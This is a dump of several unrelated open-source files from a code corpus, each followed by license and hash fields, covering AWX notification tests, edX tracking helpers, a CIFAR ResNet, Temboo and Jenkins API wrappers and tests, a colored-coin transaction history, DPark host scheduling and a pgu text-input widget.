assert 'notifications' in response.data['related']
assert 'notification_configuration' in response.data
assert 'url' in response.data['notification_configuration']
assert 'headers' in response.data['notification_configuration']
assert 'messages' in response.data
assert response.data['messages'] == {'started': None, 'success': None, 'error': None, 'workflow_approval': None}
@pytest.mark.django_db
def test_encrypted_subfields(get, post, user, organization):
def assert_send(self, messages):
assert self.account_token == "shouldhide"
return 1
u = user('admin-poster', True)
url = reverse('api:notification_template_list')
response = post(url,
dict(name="test-twilio",
description="test twilio",
organization=organization.id,
notification_type="twilio",
notification_configuration=dict(account_sid="dummy",
account_token="shouldhide",
from_number="+19999999999",
to_numbers=["9998887777"])),
u)
assert response.status_code == 201
notification_template_actual = NotificationTemplate.objects.get(id=response.data['id'])
url = reverse('api:notification_template_detail', kwargs={'pk': response.data['id']})
response = get(url, u)
assert response.data['notification_configuration']['account_token'] == "$encrypted$"
with mock.patch.object(notification_template_actual.notification_class, "send_messages", assert_send):
notification_template_actual.send("Test", {'body': "Test"})
@pytest.mark.django_db
def test_inherited_notification_templates(get, post, user, organization, project):
u = user('admin-poster', True)
url = reverse('api:notification_template_list')
notification_templates = []
for nfiers in range(3):
response = post(url,
dict(name="test-webhook-{}".format(nfiers),
description="test webhook {}".format(nfiers),
organization=organization.id,
notification_type="webhook",
notification_configuration=dict(url="http://localhost", disable_ssl_verification=False,
headers={"Test": "Header"})),
u)
assert response.status_code == 201
notification_templates.append(response.data['id'])
i = Inventory.objects.create(name='test', organization=organization)
i.save()
isrc = InventorySource.objects.create(name='test', inventory=i, source='ec2')
isrc.save()
jt = JobTemplate.objects.create(name='test', inventory=i, project=project, playbook='debug.yml')
jt.save()
@pytest.mark.django_db
def test_notification_template_simple_patch(patch, notification_template, admin):
patch(reverse('api:notification_template_detail', kwargs={'pk': notification_template.id}), { 'name': 'foo'}, admin, expect=200)
@pytest.mark.django_db
def test_notification_template_invalid_notification_type(patch, notification_template, admin):
patch(reverse('api:notification_template_detail', kwargs={'pk': notification_template.id}), { 'notification_type': 'invalid'}, admin, expect=400)
@pytest.mark.django_db
def test_disallow_delete_when_notifications_pending(delete, user, notification_template):
u = user('superuser', True)
url = reverse('api:notification_template_detail', kwargs={'pk': notification_template.id})
Notification.objects.create(notification_template=notification_template,
status='pending')
response = delete(url, user=u)
assert response.status_code == 405
@pytest.mark.django_db
def test_custom_environment_injection(post, user, organization):
u = user('admin-poster', True)
url = reverse('api:notification_template_list')
response = post(url,
dict(name="test-webhook",
description="test webhook",
organization=organization.id,
notification_type="webhook",
notification_configuration=dict(url="https://example.org", disable_ssl_verification=False,
http_method="POST", headers={"Test": "Header"})),
u)
assert response.status_code == 201
template = NotificationTemplate.objects.get(pk=response.data['id'])
with pytest.raises(ConnectionError), \
mock.patch('django.conf.settings.AWX_TASK_ENV', {'HTTPS_PROXY': '192.168.50.100:1234'}), \
mock.patch.object(HTTPAdapter, 'send') as fake_send:
def _send_side_effect(request, **kw):
assert select_proxy(request.url, kw['proxies']) == '192.168.50.100:1234'
raise ConnectionError()
fake_send.side_effect = _send_side_effect
template.send('subject', 'message')
| apache-2.0 | -8,204,096,915,528,708,000 | 47.671429 | 149 | 0.621368 | false |
a-parhom/edx-platform | common/djangoapps/track/contexts.py | 4 | 1449 | """Generates common contexts"""
import logging
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from six import text_type
from openedx.core.lib.request_utils import COURSE_REGEX
log = logging.getLogger(__name__)
def course_context_from_url(url):
"""
Extracts the course_context from the given `url` and passes it on to
`course_context_from_course_id()`.
"""
url = url or ''
match = COURSE_REGEX.match(url)
course_id = None
if match:
course_id_string = match.group('course_id')
try:
course_id = CourseKey.from_string(course_id_string)
except InvalidKeyError:
log.warning(
'unable to parse course_id "{course_id}"'.format(
course_id=course_id_string
),
exc_info=True
)
return course_context_from_course_id(course_id)
def course_context_from_course_id(course_id):
"""
Creates a course context from a `course_id`.
Example Returned Context::
{
'course_id': 'org/course/run',
'org_id': 'org'
}
"""
if course_id is None:
return {'course_id': '', 'org_id': ''}
# TODO: Make this accept any CourseKey, and serialize it using .to_string
assert isinstance(course_id, CourseKey)
return {
'course_id': text_type(course_id),
'org_id': course_id.org,
}
| agpl-3.0 | 3,403,443,364,130,557,400 | 24.421053 | 77 | 0.592823 | false |
googleinterns/out-of-distribution | src/resnet/resnet_3stage_softmax.py | 1 | 3281 | from typing import List
import torch
from torch import nn
from torch.nn import functional as F
from src.modules.normalize import Normalize
from src.resnet.residual_block import create_residual_stage
from src.resnet.shared import ResNet_Softmax, SoftmaxMode
class ResNet_3Stage_Softmax(ResNet_Softmax):
"""
Implements ResNet-v1 for classification on 32x32 RGB images (e.g. CIFAR-10).
Reference papers:
- Deep Residual Learning For Image Recognition (https://arxiv.org/pdf/1512.03385.pdf)
Reference implementations:
- akamaster (https://github.com/akamaster/pytorch_resnet_cifar10/blob/master/resnet.py)
"""
normalize: Normalize
conv1: nn.Conv2d
bn1: nn.BatchNorm2d
stage2: nn.Sequential
stage3: nn.Sequential
stage4: nn.Sequential
avgpool: nn.AdaptiveAvgPool2d
fc: nn.Linear
out_channels: int
def __init__(self, stage_sizes: List[int], n_classes: int):
super().__init__()
if len(stage_sizes) != 3:
raise ValueError("Stage_sizes must have length 3!")
if n_classes <= 1:
raise ValueError("N_classes must be greater than 1!")
self.init_layers(stage_sizes, n_classes)
self.reset_parameters()
self.out_channels = n_classes
def init_layers(self, stage_sizes: List[int], n_classes: int) -> None:
self.normalize = Normalize(3)
self.conv1 = nn.Conv2d(3, 16, 3, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(16)
self.stage2 = create_residual_stage(stage_sizes[0], 16, 16, 1)
self.stage3 = create_residual_stage(stage_sizes[1], 16, 32, 2)
self.stage4 = create_residual_stage(stage_sizes[2], 32, 64, 2)
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(64, n_classes)
def reset_parameters(self) -> None:
for module in self.modules():
if isinstance(module, (nn.Conv2d, nn.Linear)):
nn.init.kaiming_normal_(module.weight, nonlinearity="relu")
def forward(self, x: torch.Tensor, mode: SoftmaxMode) -> torch.Tensor:
if x.shape[1:] != (3, 32, 32):
raise ValueError("Input tensor must have shape [N, C=3, H=32, W=32]!")
x = self.normalize(x)
x = self.conv1(x)
x = self.bn1(x)
x = F.relu(x, inplace=True)
x = self.stage2(x)
x = self.stage3(x)
x = self.stage4(x)
x = self.avgpool(x)
x = torch.flatten(x, 1)
x = self.fc(x)
if mode == SoftmaxMode.LOGITS:
return x
elif mode == SoftmaxMode.LOG_SOFTMAX:
return F.log_softmax(x, dim=1)
else:
assert mode == SoftmaxMode.SOFTMAX
return F.softmax(x, dim=1)
class ResNet20_Softmax(ResNet_3Stage_Softmax):
def __init__(self, n_classes: int):
super().__init__([3, 3, 3], n_classes)
class ResNet32_Softmax(ResNet_3Stage_Softmax):
def __init__(self, n_classes: int):
super().__init__([5, 5, 5], n_classes)
class ResNet44_Softmax(ResNet_3Stage_Softmax):
def __init__(self, n_classes: int):
super().__init__([7, 7, 7], n_classes)
class ResNet56_Softmax(ResNet_3Stage_Softmax):
def __init__(self, n_classes: int):
super().__init__([9, 9, 9], n_classes)
| apache-2.0 | 4,755,826,015,938,023,000 | 30.548077 | 91 | 0.614752 | false |
jordanemedlock/psychtruths | temboo/core/Library/Amazon/SNS/Unsubscribe.py | 5 | 3824 | # -*- coding: utf-8 -*-
###############################################################################
#
# Unsubscribe
# Deletes a specified subscription.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class Unsubscribe(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the Unsubscribe Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(Unsubscribe, self).__init__(temboo_session, '/Library/Amazon/SNS/Unsubscribe')
def new_input_set(self):
return UnsubscribeInputSet()
def _make_result_set(self, result, path):
return UnsubscribeResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return UnsubscribeChoreographyExecution(session, exec_id, path)
class UnsubscribeInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the Unsubscribe
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AWSAccessKeyId(self, value):
"""
Set the value of the AWSAccessKeyId input for this Choreo. ((required, string) The Access Key ID provided by Amazon Web Services.)
"""
super(UnsubscribeInputSet, self)._set_input('AWSAccessKeyId', value)
def set_AWSSecretKeyId(self, value):
"""
Set the value of the AWSSecretKeyId input for this Choreo. ((required, string) The Secret Key ID provided by Amazon Web Services.)
"""
super(UnsubscribeInputSet, self)._set_input('AWSSecretKeyId', value)
def set_SubscriptionArn(self, value):
"""
Set the value of the SubscriptionArn input for this Choreo. ((required, string) The ARN of the subscription you want to delete.)
"""
super(UnsubscribeInputSet, self)._set_input('SubscriptionArn', value)
def set_UserRegion(self, value):
"""
Set the value of the UserRegion input for this Choreo. ((optional, string) The AWS region that corresponds to the SNS endpoint you wish to access. The default region is "us-east-1". See description below for valid values.)
"""
super(UnsubscribeInputSet, self)._set_input('UserRegion', value)
class UnsubscribeResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the Unsubscribe Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((xml) The response from Amazon.)
"""
return self._output.get('Response', None)
class UnsubscribeChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return UnsubscribeResultSet(response, path)
| apache-2.0 | 3,768,856,715,482,202,000 | 38.42268 | 230 | 0.675994 | false |
JohnLZeller/jenkinsapi | jenkinsapi_tests/unittests/test_fingerprint.py | 7 | 2101 | import mock
# To run unittests on python 2.6 please use unittest2 library
try:
import unittest2 as unittest
except ImportError:
import unittest
import hashlib
import requests
from jenkinsapi.jenkins import Jenkins
from jenkinsapi.jenkinsbase import JenkinsBase
from jenkinsapi.fingerprint import Fingerprint
from jenkinsapi.utils.requester import Requester
class TestFingerprint(unittest.TestCase):
def setUp(self):
self.baseurl = 'http://localhost:8080'
m = hashlib.md5()
m.update("some dummy string".encode('ascii'))
self.dummy_md5 = m.hexdigest()
@mock.patch.object(Jenkins, '_poll')
@mock.patch.object(JenkinsBase, '_poll')
def test_object_creation(self, _poll, _basepoll):
J = Jenkins(self.baseurl, username='foouser', password='foopassword')
self.fp_instance = Fingerprint(self.baseurl, self.dummy_md5, J)
self.assertTrue(isinstance(self.fp_instance, Fingerprint))
self.assertEquals(str(self.fp_instance), self.dummy_md5)
self.assertTrue(self.fp_instance.valid())
@mock.patch.object(Jenkins, '_poll')
@mock.patch.object(JenkinsBase, '_poll')
def test_valid_with_requests_HTTPError_404(self, _poll, _basepoll):
resp_obj = requests.models.Response()
resp_obj.status_code = 404
_poll.side_effect = requests.exceptions.HTTPError(response=resp_obj)
J = Jenkins(self.baseurl, username='foouser', password='foopassword')
fp = Fingerprint(self.baseurl, self.dummy_md5, J)
self.assertTrue(fp.valid())
@mock.patch.object(Jenkins, '_poll')
@mock.patch.object(JenkinsBase, '_poll')
def test_valid_with_requests_HTTPError_Not404(self, _poll, _basepoll):
resp_obj = requests.models.Response()
resp_obj.status_code = 401
_poll.side_effect = requests.exceptions.HTTPError(response=resp_obj)
J = Jenkins(self.baseurl, username='foouser', password='foopassword')
fp = Fingerprint(self.baseurl, self.dummy_md5, J)
self.assertFalse(fp.valid())
if __name__ == '__main__':
unittest.main()
| mit | -8,053,214,561,620,731,000 | 37.907407 | 77 | 0.687292 | false |
Manojkumar91/odoo_inresto | addons/l10n_gr/__init__.py | 8 | 1036 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2008 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
#import sandwich_wizard
#import order_create
| agpl-3.0 | 6,357,249,882,700,849,000 | 42.166667 | 78 | 0.603282 | false |
douban/dpark | dpark/hostatus.py | 1 | 6067 | import time
import random
from six.moves import filter
from dpark.utils.log import get_logger
PURGE_ELAPSED = 60 * 5
FAILED_TIMES = 2
logger = get_logger(__name__)
class HostStatus:
def __init__(self, hostname, purge_elapsed=PURGE_ELAPSED):
self.hostname = hostname
self.failed_log = []
self.succeeded_log = []
self.failed_cnt = 0
self.succeed_cnt = 0
self.start_point = 0
self.failed_tasks = {}
self.purge_elapsed = purge_elapsed
def task_succeed(self, task_id):
self.succeeded_log.append(time.time())
if task_id in self.failed_tasks:
del self.failed_tasks[task_id]
def task_failed(self, task_id):
cur_ts = time.time()
self.failed_log.append(cur_ts)
if task_id in self.failed_tasks:
self.failed_tasks[task_id].append(cur_ts)
else:
self.failed_tasks[task_id] = [cur_ts]
def purge_old(self):
cur_ts = time.time()
prev_ts = cur_ts - self.purge_elapsed
self.failed_log = list(filter(lambda x: x > prev_ts, self.failed_log))
self.succeeded_log = list(filter(lambda x: x > prev_ts,
self.succeeded_log))
self.failed_cnt = len(self.failed_log)
self.succeed_cnt = len(self.succeeded_log)
self.start_point = self._begin_log_ts()
def recent_succeed_rate(self):
self.purge_old()
if self.failed_cnt + self.succeed_cnt < 1:
return 1
return self.succeed_cnt * 1.0 / (self.succeed_cnt + self.failed_cnt)
def failed_on(self, task_id):
return task_id in self.failed_tasks
def should_forbit(self, task_id):
self.purge_old()
if task_id in self.failed_tasks:
cur_elapsed = time.time() - self.failed_tasks[task_id][-1]
mask_elapsed = self.purge_elapsed * pow(2, len(self.failed_tasks[task_id]))
return cur_elapsed < mask_elapsed
return False
def _begin_log_ts(self):
ts = [time.time()]
if self.failed_log:
ts.append(self.failed_log[0])
if self.succeeded_log:
ts.append(self.succeeded_log[0])
return min(ts)
def total_recent_task_run(self):
return self.succeed_cnt + self.failed_cnt
def erase_failed_task(self, task_id):
if task_id in self.failed_tasks:
del self.failed_tasks[task_id]
class TaskHostManager:
def __init__(self):
self.host_dict = {}
self.task_host_failed_dict = {}
def register_host(self, hostname, purge_elapsed=PURGE_ELAPSED):
if hostname not in self.host_dict:
# logger.debug('register %s to the task host manager', hostname)
self.host_dict[hostname] = HostStatus(hostname, purge_elapsed=purge_elapsed)
def task_failed_on_host(self, task_id, host):
if host in self.host_dict:
host_status = self.host_dict[host]
return host_status.failed_on(task_id)
return False
def offer_choice(self, tid, host_offers, blacklist):
ordi_hosts = []
fail_hosts = []
forbit_host = []
for host in host_offers:
host_status = self.host_dict[host]
if host in blacklist or host_status.should_forbit(tid):
forbit_host.append(host)
elif self.task_failed_on_host(tid, host):
fail_hosts.append((host, host_status.recent_succeed_rate()))
else:
ordi_hosts.append((host, host_status.recent_succeed_rate()))
logger.debug('split the offer in to three parts \n '
'ordinary %s \nonce failed %s blacklist host %s',
str(ordi_hosts), str(fail_hosts), str(forbit_host))
if ordi_hosts:
return host_offers[self._random_weighted_choice(ordi_hosts)]
elif fail_hosts:
return host_offers[self._random_weighted_choice(fail_hosts)]
return None, None
@staticmethod
def _random_weighted_choice(w_list):
total = sum(w for h, w in w_list)
chosen_w = random.uniform(0, total)
cur_w = 0
for h, w in w_list:
if cur_w + w >= chosen_w:
return h
cur_w += w
assert False, 'Should not get here'
def task_succeed(self, task_id, hostname, reason):
logger.debug('task %s %s', task_id, str(reason))
if hostname in self.host_dict:
host_status = self.host_dict[hostname]
host_status.task_succeed(task_id)
if task_id in self.task_host_failed_dict:
for host in self.task_host_failed_dict[task_id]:
self.host_dict[host].erase_failed_task(task_id)
logger.debug('the failed hosts %s for task %s',
str(self.task_host_failed_dict[task_id]), task_id)
del self.task_host_failed_dict[task_id]
def task_failed(self, task_id, hostname, reason):
logger.debug('task %s failed with message %s', task_id, str(reason))
if hostname in self.host_dict:
host_status = self.host_dict[hostname]
host_status.task_failed(task_id)
if task_id not in self.task_host_failed_dict:
self.task_host_failed_dict[task_id] = set()
self.task_host_failed_dict[task_id].add(hostname)
def is_unhealthy_host(self, host):
if host not in self.host_dict:
return False
host_status = self.host_dict[host]
succeed_rate = host_status.recent_succeed_rate()
duration = time.time() - host_status.start_point
total_tasks = host_status.total_recent_task_run()
if duration > 30 and total_tasks > 20 and succeed_rate < 0.1:
logger.debug('the host %s will be judge unhealthy for '
'succeed rate %.1f%% with %d tasks in '
'duration more than %.3fs',
host, succeed_rate, total_tasks, duration)
return True
| bsd-3-clause | -5,840,643,752,251,686,000 | 36.91875 | 88 | 0.580188 | false |
jeorgen/ngcccbase | ngcccbase/txhistory.py | 4 | 10604 | import time
from coloredcoinlib.store import PersistentDictStore
from asset import AdditiveAssetValue, AssetTarget
from txcons import RawTxSpec
from ngcccbase.address import AddressRecord
def asset_value_to_data(av):
return (av.get_asset().get_id(),
av.get_value())
class TxHistoryEntry(object):
def __init__(self, model, data):
self.txhash = data['txhash']
self.txtime = data['txtime']
self.txtype = data['txtype']
self.data = data
self.model = model
@classmethod
def from_data(cls, model, data):
txtype = data['txtype']
if txtype == 'send':
return TxHistoryEntry_Send(model, data)
elif txtype == 'receive':
return TxHistoryEntry_Receive(model, data)
elif txtype == 'trade':
return TxHistoryEntry_Trade(model, data)
if txtype == 'complex':
return TxHistoryEntry_Complex(model, data)
else:
return TxHistoryEntry(model, data)
class TxHistoryEntry_Send(TxHistoryEntry):
def __init__(self, model, data):
super(TxHistoryEntry_Send, self).__init__(model, data)
self.asset_id = data['asset_id']
self.targets = data['targets']
def get_asset(self):
adm = self.model.get_asset_definition_manager()
return adm.get_asset_by_id(self.asset_id)
def get_fee_asset_target(self):
adm = self.model.get_asset_definition_manager()
asset = adm.get_asset_by_moniker("bitcoin")
fee = self.model.get_blockchain_state().get_tx(self.txhash).get_fee()
asset_value = AdditiveAssetValue(asset=asset, value=fee)
return AssetTarget(None, asset_value)
def get_targets(self):
asset = self.get_asset()
asset_targets = []
for (tgt_addr, tgt_value) in self.targets:
asset_value = AdditiveAssetValue(asset=asset, value=tgt_value)
asset_targets.append(AssetTarget(tgt_addr, asset_value))
try:
asset_targets.append(self.get_fee_asset_target())
except:
pass
return asset_targets
class TxHistoryEntry_Complex(TxHistoryEntry):
def __init__(self, model, data):
super(TxHistoryEntry_Complex, self).__init__(model, data)
self.data = data
def get_deltas(self):
adm = self.model.get_asset_definition_manager()
deltas = []
for assetid, value in self.data['deltas'].items():
deltas.append(adm.get_assetvalue_for_assetid_value(assetid, value))
return deltas
def get_addresses(self):
return ", ".join(self.data['addresses'])
class TxHistoryEntry_Receive(TxHistoryEntry):
def __init__(self, model, data):
super(TxHistoryEntry_Receive, self).__init__(model, data)
self.out_idxs = data['out_idxs']
def get_targets(self):
targets = []
coindb = self.model.get_coin_manager()
adm = self.model.get_asset_definition_manager()
for out_idx in self.out_idxs:
coin = coindb.find_coin(self.txhash, out_idx)
colorvalues = coin.get_colorvalues()
if not colorvalues:
continue
assert len(colorvalues) == 1
asset_value = adm.get_assetvalue_for_colorvalue(
colorvalues[0])
targets.append(AssetTarget(coin.address,
asset_value))
return targets
class TxHistoryEntry_Trade(TxHistoryEntry):
def __init__(self, model, data):
TxHistoryEntry.__init__(self, model, data)
self.in_values = data['in_values']
self.out_values = data['out_values']
def get_values(self, values):
adm = self.model.get_asset_definition_manager()
avalues = []
for asset_id, value in values:
asset = adm.get_asset_by_id(asset_id)
avalues.append(AdditiveAssetValue(asset=asset,
value=value))
return avalues
def get_in_values(self):
return self.get_values(self.in_values)
def get_out_values(self):
return self.get_values(self.out_values)
class TxHistory(object):
def __init__(self, model):
self.model = model
self.entries = PersistentDictStore(
self.model.store_conn.conn, "txhistory")
def decode_entry(self, entry_data):
return TxHistoryEntry.from_data(self.model, entry_data)
def get_entry(self, txhash):
entry = self.entries.get(txhash)
if entry:
return self.decode_entry(entry)
else:
return None
def get_all_entries(self):
return sorted([self.decode_entry(e)
for e in self.entries.values()],
key=lambda txe: txe.txtime)
def populate_history(self):
txdb = self.model.get_tx_db()
for txhash in txdb.get_all_tx_hashes():
if (txhash not in self.entries or # new transaction
not self.entries[txhash]['txtime']): # update unconfirmed
tx_data = txdb.get_tx_by_hash(txhash)['data']
raw_tx = RawTxSpec.from_tx_data(self.model,
tx_data.decode('hex'))
self.add_entry_from_tx(raw_tx)
def get_tx_timestamp(self, txhash): # TODO move to suitable file
txtime = 0
bs = self.model.get_blockchain_state()
blockhash, x = bs.get_tx_blockhash(txhash)
if blockhash:
height = bs.get_block_height(blockhash)
if height:
header = bs.get_header(height)
txtime = header.get('timestamp', txtime)
return txtime
def is_receive_entry(self, raw_tx, spent_coins, received_coins):
return not spent_coins and received_coins
def create_receive_entry(self, raw_tx, received_coins):
txhash = raw_tx.get_hex_txhash()
txtime = self.get_tx_timestamp(txhash)
out_idxs = [coin.outindex for coin in received_coins]
self.entries[txhash] = {"txhash": txhash,
"txtype": 'receive',
"txtime": txtime,
"out_idxs": out_idxs}
def add_trade_entry(self, txhash, in_colorvalue, out_colorvalue):
adm = self.model.get_asset_definition_manager()
in_assetvalue = adm.get_assetvalue_for_colorvalue(in_colorvalue)
out_assetvalue = adm.get_assetvalue_for_colorvalue(out_colorvalue)
txtime = self.get_tx_timestamp(txhash)
self.entries[txhash] = {"txhash": txhash,
"txtype": 'trade',
"txtime": txtime,
"in_values": [asset_value_to_data(in_assetvalue)],
"out_values": [asset_value_to_data(out_assetvalue)]}
def add_unknown_entry(self, txhash):
txtime = self.get_tx_timestamp(txhash)
self.entries[txhash] = {"txhash": txhash,
"txtype": 'unknown',
"txtime": txtime}
def get_delta_color_values(self, spent_coins, received_coins):
adm = self.model.get_asset_definition_manager()
deltas = {}
for coin in received_coins: # add received
for cv in coin.get_colorvalues():
colorid = cv.get_colordef().get_color_id()
assetid = adm.get_asset_by_color_id(colorid).get_id()
deltas[assetid] = deltas.get(assetid, 0) + cv.get_value()
for coin in spent_coins: # subtract sent
for cv in coin.get_colorvalues():
colorid = cv.get_colordef().get_color_id()
assetid = adm.get_asset_by_color_id(colorid).get_id()
deltas[assetid] = deltas.get(assetid, 0) - cv.get_value()
return dict(deltas)
def create_complex_entry(self, raw_tx, spent_coins, received_coins):
am = self.model.get_address_manager()
txhash = raw_tx.get_hex_txhash()
txtime = self.get_tx_timestamp(txhash)
# get addresses
outputs = raw_tx.composed_tx_spec.txouts
wallet_addrs = set([r.address for r in am.get_all_addresses()])
output_addrs = set([out.target_addr for out in outputs])
send_addrs = list(output_addrs.difference(wallet_addrs))
deltas = self.get_delta_color_values(spent_coins, received_coins)
self.entries[txhash] = {
"txhash": txhash,
"txtype": 'complex',
"txtime": txtime,
"addresses" : send_addrs,
"deltas" : deltas,
}
def is_send_entry(self, raw_tx, spent_coins, received_coins):
am = self.model.get_address_manager()
# only inputs from this wallet
input_addrs = set(raw_tx.get_input_addresses())
wallet_addrs = set([r.address for r in am.get_all_addresses()])
if wallet_addrs.intersection(input_addrs) != input_addrs:
return False # foreign inputs
# only one color + uncolored sent
cvlists = [coin.get_colorvalues() for coin in spent_coins]
cvs = [item for sublist in cvlists for item in sublist] # flatten
cids = set([cv.get_color_id() for cv in cvs])
if len(cids) > 2 or (len(cids) == 2 and 0 not in cids):
return False
return False # FIXME disabled for now
def create_send_entry(self, raw_tx, spent_coins, received_coins):
pass # TODO
def add_send_entry(self, txhash, asset, target_addrs, target_values):
self.entries[txhash] = {"txhash": txhash,
"txtype": 'send',
"txtime": int(time.time()),
"asset_id": asset.get_id(),
"targets": zip(target_addrs, target_values)}
def add_entry_from_tx(self, raw_tx):
coindb = self.model.get_coin_manager()
spent_coins, received_coins = coindb.get_coins_for_transaction(raw_tx)
if (not spent_coins) and (not received_coins):
return # no effect
# receive coins
if self.is_receive_entry(raw_tx, spent_coins, received_coins):
self.create_receive_entry(raw_tx, received_coins)
# send coins
elif self.is_send_entry(raw_tx, spent_coins, received_coins):
self.create_send_entry(raw_tx, spent_coins, received_coins)
else: # default for non obvious
self.create_complex_entry(raw_tx, spent_coins, received_coins)
| mit | 8,367,247,994,701,882,000 | 37.985294 | 84 | 0.578367 | false |
111pontes/ydk-py | cisco-ios-xe/ydk/models/cisco_ios_xe/_meta/_ENTITY_STATE_TC_MIB.py | 1 | 1911 |
import re
import collections
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION, ANYXML_CLASS
from ydk.errors import YPYError, YPYModelError
from ydk.providers._importer import _yang_ns
_meta_table = {
'EntityoperstateEnum' : _MetaInfoEnum('EntityoperstateEnum', 'ydk.models.cisco_ios_xe.ENTITY_STATE_TC_MIB',
{
'unknown':'unknown',
'disabled':'disabled',
'enabled':'enabled',
'testing':'testing',
}, 'ENTITY-STATE-TC-MIB', _yang_ns._namespaces['ENTITY-STATE-TC-MIB']),
'EntityusagestateEnum' : _MetaInfoEnum('EntityusagestateEnum', 'ydk.models.cisco_ios_xe.ENTITY_STATE_TC_MIB',
{
'unknown':'unknown',
'idle':'idle',
'active':'active',
'busy':'busy',
}, 'ENTITY-STATE-TC-MIB', _yang_ns._namespaces['ENTITY-STATE-TC-MIB']),
'EntityadminstateEnum' : _MetaInfoEnum('EntityadminstateEnum', 'ydk.models.cisco_ios_xe.ENTITY_STATE_TC_MIB',
{
'unknown':'unknown',
'locked':'locked',
'shuttingDown':'shuttingDown',
'unlocked':'unlocked',
}, 'ENTITY-STATE-TC-MIB', _yang_ns._namespaces['ENTITY-STATE-TC-MIB']),
'EntitystandbystatusEnum' : _MetaInfoEnum('EntitystandbystatusEnum', 'ydk.models.cisco_ios_xe.ENTITY_STATE_TC_MIB',
{
'unknown':'unknown',
'hotStandby':'hotStandby',
'coldStandby':'coldStandby',
'providingService':'providingService',
}, 'ENTITY-STATE-TC-MIB', _yang_ns._namespaces['ENTITY-STATE-TC-MIB']),
}
| apache-2.0 | 5,016,428,239,592,756,000 | 42.431818 | 197 | 0.638409 | false |
TalShafir/ansible | lib/ansible/utils/module_docs_fragments/opennebula.py | 33 | 1345 | # -*- coding: utf-8 -*-
#
# Copyright 2018 www.privaz.io Valletech AB
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
class ModuleDocFragment(object):
# OpenNebula common documentation
DOCUMENTATION = '''
options:
api_url:
description:
- The ENDPOINT URL of the XMLRPC server.
If not specified then the value of the ONE_URL environment variable, if any, is used.
aliases:
- api_endpoint
api_username:
description:
- The name of the user for XMLRPC authentication.
If not specified then the value of the ONE_USERNAME environment variable, if any, is used.
api_password:
description:
- The password or token for XMLRPC authentication.
If not specified then the value of the ONE_PASSWORD environment variable, if any, is used.
aliases:
- api_token
validate_certs:
description:
- Whether to validate the SSL certificates or not.
This parameter is ignored if PYTHONHTTPSVERIFY environment variable is used.
type: bool
default: true
wait_timeout:
description:
- time to wait for the desired state to be reached before timeout, in seconds.
default: 300
'''
| gpl-3.0 | 278,576,386,282,889,250 | 35.351351 | 104 | 0.630483 | false |
jjinux/hellacopy | lib/pgu/gui/input.py | 7 | 4938 | """
"""
import pygame
from pygame.locals import *
from const import *
import widget
class Input(widget.Widget):
"""A single line text input.
<pre>Input(value="",size=20)</pre>
<dl>
<dt>value<dd>initial text
<dt>size<dd>size for the text box, in characters
</dl>
<strong>Example</strong>
<code>
w = Input(value="Cuzco the Goat",size=20)
w = Input("Marbles")
</code>
"""
def __init__(self,value="",size=20,**params):
params.setdefault('cls','input')
widget.Widget.__init__(self,**params)
self.value = value
self.pos = len(str(value))
self.vpos = 0
self.font = self.style.font
w,h = self.font.size("e"*size)
if not self.style.height: self.style.height = h
if not self.style.width: self.style.width = w
#self.style.height = max(self.style.height,h)
#self.style.width = max(self.style.width,w)
#self.rect.w=w+self.style.padding_left+self.style.padding_right;
#self.rect.h=h+self.style.padding_top+self.style.padding_bottom;
def paint(self,s):
r = pygame.Rect(0,0,self.rect.w,self.rect.h)
cs = 2 #NOTE: should be in a style
w,h = self.font.size(self.value[0:self.pos])
x = w-self.vpos
if x < 0: self.vpos -= -x
if x+cs > s.get_width(): self.vpos += x+cs-s.get_width()
s.blit(self.font.render(self.value, 1, self.style.color),(-self.vpos,0))
if self.container.myfocus is self:
w,h = self.font.size(self.value[0:self.pos])
r.x = w-self.vpos
r.w = cs
r.h = h
s.fill(self.style.color,r)
def _setvalue(self,v):
self.__dict__['value'] = v
self.send(CHANGE)
def event(self,e):
used = None
if e.type == KEYDOWN:
if e.key == K_BACKSPACE:
if self.pos:
